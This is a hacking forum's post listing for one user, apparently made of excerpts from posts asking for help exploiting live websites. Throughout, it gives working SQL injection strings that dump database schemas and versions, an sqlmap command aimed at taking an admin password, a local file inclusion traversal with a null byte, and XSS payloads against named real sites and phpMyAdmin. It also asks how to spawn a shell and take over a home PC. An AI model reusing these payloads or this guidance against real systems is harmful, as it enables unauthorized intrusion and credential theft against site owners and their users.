Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 48
4 years ago
GaSmo
http://ha.ckers.org/xss.html here you find some XSS with style
Forum: XSS Info
4 years ago
GaSmo
Hey, i've found a LFI Bug in a "security" website. But I don't get access to error.log, seems like i only can include files within /www/ /index.php?page=../../etc/httpd/logs/acces_log%00 Warning: file_exists() : open_basedir restriction in effect. File(../../etc/httpd/logs/acces_log.php) is not within the allowed path(s): (/www/htdocs/w00a68a8/:/tmp:/usr/bin:/www/htdocs/w00a68a
Forum: SQL and Code Injection
4 years ago
GaSmo
Hey there, found a page of a big av, with a xss hole. i can place " to break content of a metatag, problem here is, tah everything after ";" will be deleted. so is there any other waY? this url: &q=gasm-1'" http-equiv="refresh" content="23; URL=http://de.selfhtml.org/"> will get this code: <meta name="keywords" content="
Forum: XSS Info
4 years ago
GaSmo
content.php?Mid=2%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20--%20-
Forum: SQL and Code Injection
4 years ago
GaSmo
$query = "UPDATE newsletter_subscribe" . " SET enabled = 0 WHERE id='".$subscriber_id."'"; is there a way to update other vars too if $subscriber_id is injectable?
Forum: SQL and Code Injection
4 years ago
GaSmo
Hi, found a blind sql injection in a newsletterscript. &subscriber=23' AND '1'='1 - finde &subscriber=23' AND '1'='11 - error so i thought sqlmap would be fine to get my admin password. sqlmap.exe -u "http://xxx.com/index.php?subscriber=23" -p "subscriber" --prefix "'" --postfix "AND '1'='1" as i run this first time, sqlmap shows me t
Forum: SQL and Code Injection
4 years ago
GaSmo
Hi there, just where taking a look at one of these "trusted online shop sign" sites. all listed shops are safe against sqli, xss, and so on, there are lot of these sites (like mcafee-secure sign). first Shop is an e:commerce Shop, coID/-1' gives me: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to
Forum: SQL and Code Injection
4 years ago
GaSmo
ha! Ok, sry searched with wrong parameters. Styles are the magic way to get it work. thanks :) ps: damned phpmyadmin token ;)
Forum: XSS Info
4 years ago
GaSmo
Hi, I found way to inject code, but got a problem to start it. <input type="hidden" name="rows" value=""/> I can inject into value: <input type="hidden" name="zero_rows" value="" onmouseover="alert(23)" /> U can see, the onmouseover will never trigger cuz the type is hidden. Do one of you guys know a
Forum: XSS Info
4 years ago
GaSmo
Hi there, still having problems with my xss in my cms. Only can run an onmouseover - xss is in a form tag: <form action="admin/index.php?menus" onmouseover=alert(23)" method="post" name="menu"> (works fine) next step I think i have to go, is to document.write my XSS Payload. But this dosn't work. XSS-code: " onmouseover="document.wri
Forum: XSS Info
4 years ago
GaSmo
sry, i don't get it. for example, i work with an cms, found a xss hole in one site of the backend - but want to get information from another site - this will work as long as both sites are on same domain? admin.php?function=pictures&name=XSS <- xssable site admin.php?function=database <- site with informations i need, for example: <input type="text" name="user&
Forum: XSS Info
5 years ago
GaSmo
Hey, thx for answer, but i want to do it on myself :P You're right, last injections i did where mysql, so maybe this will be my problem. so i reed some tutorials bout mssql. via: Hunter' and+1=convert(int,@@version)-- - i get version of server. Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition
Forum: SQL and Code Injection
5 years ago
GaSmo
Hi, got some problems with an injection into a MSSQL Db. &user=Hunter' ORDER BY 15-- - works fine, page is displayed normal. ORDER BY 16 gives me this error: Timestamp: {ts '2009-09-16 11:54:47'} Type: Database Error Message: Error Executing Database Query. The ORDER BY position number 16 is out of range of the number of items in the select list. <br>The error occurred on line 49
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey there, I just tryed to spawn a shell via the ACP of a WBB 2.3.6 Never did it before, but I thought it should work with injection phpcode into a template. So i edit forgotpw template and addet some php and html code. The htmlcode works fine, but the php code will not work. So someone plz can tell me, how I can spwan a shell while I have access to the ACP? greetz
Forum: SQL and Code Injection
5 years ago
GaSmo
I found a page with an sql injection. It's something like select * from bla where id = so, i found user and pass from user.mysql but phpmyadmin isn't reachable from anyother one than localhost. With loadfile i can read files like boot.ini but Magicquotes is turned on, so I can't use into_outfile. It's a winXP homePC wit WAMP - so is there anyother way to own this machine?
Forum: SQL and Code Injection
5 years ago
GaSmo
ok, so now I know that the mysql user is root without a password. But I can't reach /phpmyadmin/ from internet, think it only acceppt connections from localhost. So what way from now on you would go? I found a XSRF Exploit for XAMPP but the targeted page has WAMP, maybe it would work too, to change settings so I can reach myadmin via web. Apache version : Apache/2.0.58 (Win32) PHP ver
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey, once again it's me asking noobquestions. so, I get the names of the db's with: 1234+AND+1=0+UNION+SELECT+ALL+1,group_concat(schema_name),3,4,5+from+information_schema.schemata/* this gives me: information_schema,tf,mysql,phpmyadmin,ball,test but now I don't understand how to go on. 1234+AND+1=0+UNION+SELECT+ALL+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+
Forum: SQL and Code Injection
5 years ago
GaSmo
hey, once again I'm trying aroudn with SQL Injection. search.php?zs=1&searchstring=test&cat=1+ORDER+BY+1-- shows me the page correct, search.php?zs=1&searchstring=test&cat=1+ORDER+BY+2-- gives me an "Unknown column '2' in 'order clause'" at the first time, now it show's the page corret. Same with for example 15. What's up there? Will it be possible to inject
Forum: SQL and Code Injection
5 years ago
GaSmo
hey, this dosen't work :| /index.php?bla=red is the real string, working. /index.php?bla=rexx gives me an error: Table 'usr_web2_1.rexx' doesn't exist so I think the query is something like: select * from '$bla' so this injection will be only possible by bruting the tablenames right?
Forum: SQL and Code Injection
5 years ago
GaSmo
If I use this injection: /index.php?&bla=reden+UNION+SELECT+ALL+1,2,3,4,5,6 (tryed it from 1 to 1,2...19,20) I get an Error like: The used SELECT statements have a different number of columns So I'm on the right way, am I not?
Forum: SQL and Code Injection
5 years ago
GaSmo
Hey, yesterday I reed http://www.milw0rm.org/papers/225 Tryed it on a page, did it till 1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()-- without problems. now I'm trying this on an other page: URL: id=1'+ORDER+BY+1/* MySQL server version for the right syntax to use near 'OR id='1' ORDER BY 1/*' ORDER BY d
Forum: SQL and Code Injection
6 years ago
GaSmo
http://www.seaturtle.org/tracking/index.shtml?keyword=%22%3E%3Cscript%3Ealert(23)%3C/script%3E XSS works on clientside, so u can't use commandline commands.
Forum: XSS Info
6 years ago
GaSmo
Hey, on myspace.com there is a function to import your friends from gmx, web, yahoo and so on to myspace. Normaly you can't enter more than 3 wrong passwords on gmx.de without having their bruteforceprotection start to work. on myspace.com, you can enter wrong passwords as often as u want. I just tryed 10 wrong passwords and than the right one, and it worked without problems like timed
Forum: Full Disclosure
6 years ago
GaSmo
http://localhost/phpmyadmin/server_privileges.php?db=pension&token=0836b9c8e268a471e08e6120f9b53c3c&goto=db_operations.php&username=root&hostname=127.0.0.%22%3E%22%3E%3Cscript%3Ealert("GaSmo")%3C/script%3E
Forum: Full Disclosure
6 years ago
GaSmo
Hey there, I've found a XSS hole in phpmyadmin 2.11.4 The problem is, it's behind the token in the url: http://localhost/phpmyadmin/bla.php?db=test&token=8TOKEN6&goto=bla2.php&var="><script>alert(23)</script> If u know the used token it's no problem, but would there be any possibility without knowing it?
Forum: XSS Info
6 years ago
GaSmo
Hi, I had a little Idea. So, there are often XSS holes in myspace. I want tow rite a myspace-tracker. How it could work is already in my head/coded. Now I just need to know if flash inserted in this way: <object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="240" width="350" data="
Forum: XSS Info
6 years ago
GaSmo
now the subdomain is down, can't reach it anymore.
Forum: XSS Info
6 years ago
GaSmo
fixed? I always get a myspace Errorpage. Any possibilty to inject js in your profil?
Forum: XSS Info
6 years ago
GaSmo
jup, is fixed! < & > are filtered, but maybe there's n other way.
Forum: Full Disclosure
6 years ago
GaSmo
http://www.addthis.com/bookmark.php?v=12&winname=addthis&pub=myspace&lng=&s=undefined&url=http://google.de&title=--%3E%22%3E%3Cscript%3Ealert('gasmo')%3C/script%3E this site is now also used by myspace.
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2